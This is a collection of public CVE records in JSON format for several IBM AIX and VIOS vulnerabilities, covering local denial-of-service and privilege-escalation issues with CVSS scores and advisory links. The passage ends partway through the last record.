{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T03:14:54.625Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6560390" }, { "name": "ibm-aix-cve202222350-dos (220394)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/220394" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" }, { "status": "affected", "version": "7.3" } ] }, { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] } ], "datePublic": "2022-03-01T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in CAA to cause a denial of service. IBM X-Force ID: 220394." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/UI:N/A:H/I:N/C:N/PR:N/AC:L/S:U/AV:L/RC:C/RL:O/E:U", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Denial of Service", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-03-02T16:35:16", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6560390" }, { "name": "ibm-aix-cve202222350-dos (220394)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/220394" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2022-03-01T00:00:00", "ID": "CVE-2022-22350", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" }, { "version_value": "7.3" } ] } }, { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in CAA to cause a denial of service. IBM X-Force ID: 220394." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "N", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Denial of Service" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6560390", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6560390 (AIX)", "url": "https://www.ibm.com/support/pages/node/6560390" }, { "name": "ibm-aix-cve202222350-dos (220394)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/220394" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2022-22350", "datePublished": "2022-03-02T16:35:17.039824Z", "dateReserved": "2022-01-03T00:00:00", "dateUpdated": "2024-09-17T01:26:08.927Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-29741
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6477018 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/201478 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T22:18:02.913Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6477018" }, { "name": "ibm-aix-cve202129741-priv-escalation (201478)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/201478" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] }, { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" } ] } ], "datePublic": "2021-07-30T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a local user to exploit a vulnerability in Korn Shell (ksh) to gain root privileges. IBM X-Force ID: 201478." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 7.3, "temporalSeverity": "HIGH", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/S:U/AC:L/UI:N/I:H/PR:N/A:H/C:H/E:U/RC:C/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Gain Privileges", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-08-02T15:00:12", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6477018" }, { "name": "ibm-aix-cve202129741-priv-escalation (201478)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/201478" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2021-07-30T00:00:00", "ID": "CVE-2021-29741", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } }, { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a local user to exploit a vulnerability in Korn Shell (ksh) to gain root privileges. IBM X-Force ID: 201478." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "H", "I": "H", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Gain Privileges" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6477018", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6477018", "url": "https://www.ibm.com/support/pages/node/6477018" }, { "name": "ibm-aix-cve202129741-priv-escalation (201478)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/201478" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-29741", "datePublished": "2021-08-02T15:00:12.898731Z", "dateReserved": "2021-03-31T00:00:00", "dateUpdated": "2024-09-16T20:46:34.253Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-40233
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6847947 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/235599 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T12:14:39.819Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6847947" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/235599" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1, 7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX TCP/IP kernel extension to cause a denial of service. IBM X-Force ID: 235599." } ], "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX TCP/IP kernel extension to cause a denial of service. IBM X-Force ID: 235599." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-20", "description": "CWE-20 Improper Input Validation", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-23T18:42:55.351Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6847947" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/235599" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX denial of service", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2022-40233", "datePublished": "2022-12-23T18:42:55.351Z", "dateReserved": "2022-09-08T15:59:19.269Z", "dateUpdated": "2024-08-03T12:14:39.819Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-43382
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6848309 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/238641 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:32:58.389Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6848309" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/238641" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1, 7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a local user with elevated privileges to exploit a vulnerability in the lpd daemon to cause a denial of service. IBM X-Force ID: 238641." } ], "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a local user with elevated privileges to exploit a vulnerability in the lpd daemon to cause a denial of service. IBM X-Force ID: 238641." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-399", "description": "CWE-399 Resource Management Errors", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-20T20:11:47.065Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6848309" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/238641" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX denial of service", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2022-43382", "datePublished": "2022-12-20T20:11:47.065Z", "dateReserved": "2022-10-17T19:55:40.485Z", "dateUpdated": "2024-08-03T13:32:58.389Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2012-0745
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securitytracker.com/id?1027021 | vdb-entry, x_refsource_SECTRACK | |
http://www.ibm.com/support/docview.wss?uid=isg1IV19098 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV18637 | vendor-advisory, x_refsource_AIXAPAR | |
http://secunia.com/advisories/49073 | third-party-advisory, x_refsource_SECUNIA | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/74679 | vdb-entry, x_refsource_XF | |
http://www.ibm.com/support/docview.wss?uid=isg1IV19077 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV19097 | vendor-advisory, x_refsource_AIXAPAR | |
http://aix.software.ibm.com/aix/efixes/security/ldapauth_advisory2.asc | x_refsource_CONFIRM | |
http://www.ibm.com/support/docview.wss?uid=isg1IV18464 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.securityfocus.com/bid/53393 | vdb-entry, x_refsource_BID | |
http://www.ibm.com/support/docview.wss?uid=isg1IV18638 | vendor-advisory, x_refsource_AIXAPAR | |
http://osvdb.org/81683 | vdb-entry, x_refsource_OSVDB |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T18:38:14.373Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "1027021", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id?1027021" }, { "name": "IV19098", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV19098" }, { "name": "IV18637", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV18637" }, { "name": "49073", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/49073" }, { "name": "aix-getpwnam-privilege-escalation(74679)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74679" }, { "name": "IV19077", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV19077" }, { "name": "IV19097", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV19097" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/ldapauth_advisory2.asc" }, { "name": "IV18464", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV18464" }, { "name": "53393", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/53393" }, { "name": "IV18638", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV18638" }, { "name": "81683", "tags": [ "vdb-entry", "x_refsource_OSVDB", "x_transferred" ], "url": "http://osvdb.org/81683" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2012-05-03T00:00:00", "descriptions": [ { "lang": "en", "value": "The getpwnam function in IBM AIX 5.3, 6.1, and 7.1 and VIOS 2.1.0.10 through 2.2.1.3 does not properly interact with customer-extended LDAP user filtering, which allows local users to gain privileges via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-12-06T21:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "1027021", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id?1027021" }, { "name": "IV19098", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV19098" }, { "name": "IV18637", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV18637" }, { "name": "49073", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/49073" }, { "name": "aix-getpwnam-privilege-escalation(74679)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74679" }, { "name": "IV19077", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV19077" }, { "name": "IV19097", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV19097" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/ldapauth_advisory2.asc" }, { "name": "IV18464", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV18464" }, { "name": "53393", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/53393" }, { "name": "IV18638", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV18638" }, { "name": "81683", "tags": [ "vdb-entry", "x_refsource_OSVDB" ], "url": "http://osvdb.org/81683" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2012-0745", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The getpwnam function in IBM AIX 5.3, 6.1, and 7.1 and VIOS 2.1.0.10 through 2.2.1.3 does not properly interact with customer-extended LDAP user filtering, which allows local users to gain privileges via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "1027021", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id?1027021" }, { "name": "IV19098", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV19098" }, { "name": "IV18637", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV18637" }, { "name": "49073", "refsource": "SECUNIA", "url": "http://secunia.com/advisories/49073" }, { "name": "aix-getpwnam-privilege-escalation(74679)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74679" }, { "name": "IV19077", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV19077" }, { "name": "IV19097", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV19097" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/ldapauth_advisory2.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/ldapauth_advisory2.asc" }, { "name": "IV18464", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV18464" }, { "name": "53393", "refsource": "BID", "url": "http://www.securityfocus.com/bid/53393" }, { "name": "IV18638", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV18638" }, { "name": "81683", "refsource": "OSVDB", "url": "http://osvdb.org/81683" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2012-0745", "datePublished": "2012-05-04T16:00:00", "dateReserved": "2012-01-17T00:00:00", "dateUpdated": "2024-08-06T18:38:14.373Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-38988
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6561281 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/212950 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T01:58:16.429Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6561281" }, { "name": "ibm-aix-cve202138988-dos (212950)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/212950" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] }, { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" }, { "status": "affected", "version": "7.3" } ] } ], "datePublic": "2022-03-04T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 212950." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/PR:N/AC:L/A:H/S:U/AV:L/C:N/I:N/UI:N/RL:O/RC:C/E:U", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Denial of Service", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-03-07T16:55:13", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6561281" }, { "name": "ibm-aix-cve202138988-dos (212950)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/212950" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2022-03-04T00:00:00", "ID": "CVE-2021-38988", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } }, { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" }, { "version_value": "7.3" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 212950." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "N", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Denial of Service" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6561281", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6561281 (AIX)", "url": "https://www.ibm.com/support/pages/node/6561281" }, { "name": "ibm-aix-cve202138988-dos (212950)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/212950" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-38988", "datePublished": "2022-03-07T16:55:14.019646Z", "dateReserved": "2021-08-16T00:00:00", "dateUpdated": "2024-09-17T02:02:34.798Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-29801
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6483875 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/203977 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T22:18:03.291Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6483875" }, { "name": "ibm-aix-cve202129801-priv-escalation (203977)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/203977" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] }, { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" } ] } ], "datePublic": "2021-08-25T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the kernel to gain root privileges. IBM X-Force ID: 203977." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 7.3, "temporalSeverity": "HIGH", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/UI:N/I:H/AC:L/C:H/S:U/A:H/PR:N/RC:C/E:U/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Gain Privileges", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-08-26T19:25:27", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6483875" }, { "name": "ibm-aix-cve202129801-priv-escalation (203977)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/203977" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2021-08-25T00:00:00", "ID": "CVE-2021-29801", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } }, { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the kernel to gain root privileges. IBM X-Force ID: 203977." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "H", "I": "H", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": 